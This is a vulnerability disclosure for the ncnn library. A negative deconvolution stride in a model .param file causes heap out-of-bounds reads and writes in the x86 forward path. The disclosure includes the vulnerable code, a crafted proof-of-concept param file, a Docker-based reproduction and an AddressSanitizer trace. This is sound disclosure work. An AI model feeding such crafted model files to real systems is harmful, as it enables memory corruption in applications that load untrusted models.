Heap Buffer Overread From Negative Deconvolution Stride
Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/deconvolution_packed.h:2550 in Deconvolution_x86::forward
Sanitizer verdict: heap-buffer-overflow
The observed crash lands in src/layer/x86/deconvolution_x86.cpp:387, which is the ISA-specialised copy of the reported code path.
Summary
Deconvolution::load_param accepts a negative stride_w (parameter key 3) from the model file, and the x86 output paths only ever bounds-check the upper end of the coordinates they derive from it. With 3=-1 the col2im loop steps its output pointer backwards by one float per column, writing and reading before the start of the output tensor, while the direct packed path divides by the negative stride and produces a negative source index that its sx >= w test cannot catch. ncnnoptimize reaches this by loading the attacker's .param and running ModelWriter::shape_inference().
Detail
Nothing between Deconvolution::load_param (stride_w = pd.get(3, 1);) and the forward implementations rejects a non-positive stride. The output geometry is computed as outw = (w - 1) * stride_w + kernel_extent_w + output_pad_right, so a negative stride shrinks the allocation while the traversal still walks w steps per row — in the opposite direction.
// src/layer/x86/deconvolution_packed.h:2540
for (int x = 0; x < kernel_w; x++)
{
int sxs = (j + x * dilation_w - (kernel_extent_w - 1));
if (sxs < 0 || sxs % stride_w != 0)
continue;
int sx = sxs / stride_w;
if (sx >= w)
continue;
int k = y * kernel_w + x;
const float* sptr = bottom_blob.channel(q).row(sy) + sx;
sum += sptr[0] * kptr[k];
}
// src/layer/x86/deconvolution_x86.cpp:381
float* ptr = outm.row(dilation_h * u) + dilation_w * v;
for (int i = 0; i < h; i++)
{
for (int j = 0; j < w; j++)
{
ptr[0] += sptr[0];
ptr += stride_w;
sptr += 1;
}
In the packed path the only guards are sxs < 0 and sx >= w; sx itself is never tested for being negative, and sxs / stride_w with stride_w < 0 yields a value that is zero or negative for every non-negative sxs, so bottom_blob.channel(q).row(sy) + sx addresses memory before the input tensor. The same omission applies to sy and stride_h.
The PoC (0=1 1=3 11=1 2=1 12=1 3=-1 13=1 ... 6=3, input 2x1x1) exercises the sgemm col2im path. outw = (2 - 1) * -1 + 3 = 2 and outh = 1, so top_blob_bordered.create(2, 1, 1, 4u, 1) allocates a 16-byte payload — 84 bytes with the refcount and the 64-byte NCNN_MALLOC_OVERREAD pad. The u/v loops set ptr = outm.row(0) + dilation_w * v, which for v == 0 is the first element, and each column step then does ptr += stride_w, i.e. ptr -= 1. The second column therefore evaluates ptr[0] += sptr[0] at 4 bytes before the allocation, matching the ASan report; because it is a compound assignment the same out-of-range address is also written.
Reproduce
Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-buffer-overread-from-negative-deconvolution-stride && cd ncnn-poc-heap-buffer-overread-from-negative-deconvolution-stride
cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04
RUN apt-get update && apt-get install -y --no-install-recommends \
git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
protobuf-compiler libprotobuf-dev \
&& pip3 install --no-cache-dir --break-system-packages onnx protobuf \
&& rm -rf /var/lib/apt/lists/*
RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn
WORKDIR /ncnn
RUN cmake -S . -B build \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
-DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
&& cmake --build build -j"$(nproc)"
ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE
cat > poc.param <<'EOF'
7767517
2 2
Input in 0 1 in 0=2 1=1 2=1
Deconvolution deconv 1 1 in out 0=1 1=3 11=1 2=1 12=1 3=-1 13=1 6=3
EOF
docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
/ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0
AddressSanitizer output:
shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x50e00000057c at pc 0x5f38e3ab22d1 bp 0x7ffcd2d15f70 sp 0x7ffcd2d15f60
READ of size 4 at 0x50e00000057c thread T0
#0 0x5f38e3ab22d0 in ncnn::Deconvolution_x86_avx512::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/deconvolution_x86_avx512.cpp:387
#1 0x5f38e1381f2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
#2 0x5f38e1373b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#3 0x5f38e13d39e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#4 0x5f38e12653c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#5 0x5f38e12e2eee in main /ncnn/tools/ncnnoptimize.cpp:2844
#6 0x7b7182a921c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#7 0x7b7182a9228a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#8 0x5f38e1262624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
0x50e00000057c is located 4 bytes before 84-byte region [0x50e000000580,0x50e0000005d4)
allocated by thread T0 here:
#0 0x7b718310bf1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x5f38e12f768e in fastMalloc /ncnn/src/allocator.h:62
#2 0x5f38e12f768e in ncnn::PoolAllocator::fastMalloc(unsigned long) /ncnn/src/allocator.cpp:159
#3 0x5f38e13373a6 in ncnn::Mat::create(int, int, int, unsigned long, int, ncnn::Allocator*) /ncnn/src/mat.cpp:581
#4 0x5f38e3aab68d in ncnn::Deconvolution_x86_avx512::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/deconvolution_x86_avx512.cpp:205
#5 0x5f38e1381f2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
#6 0x5f38e1373b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#7 0x5f38e13d39e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#8 0x5f38e12653c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#9 0x5f38e12e2eee in main /ncnn/tools/ncnnoptimize.cpp:2844
#10 0x7b7182a921c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#11 0x7b7182a9228a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#12 0x5f38e1262624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
SUMMARY: AddressSanitizer: heap-buffer-overflow /ncnn/build/src/layer/x86/deconvolution_x86_avx512.cpp:387 in ncnn::Deconvolution_x86_avx512::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const
Credit
Zheng Yu @ DepthFirst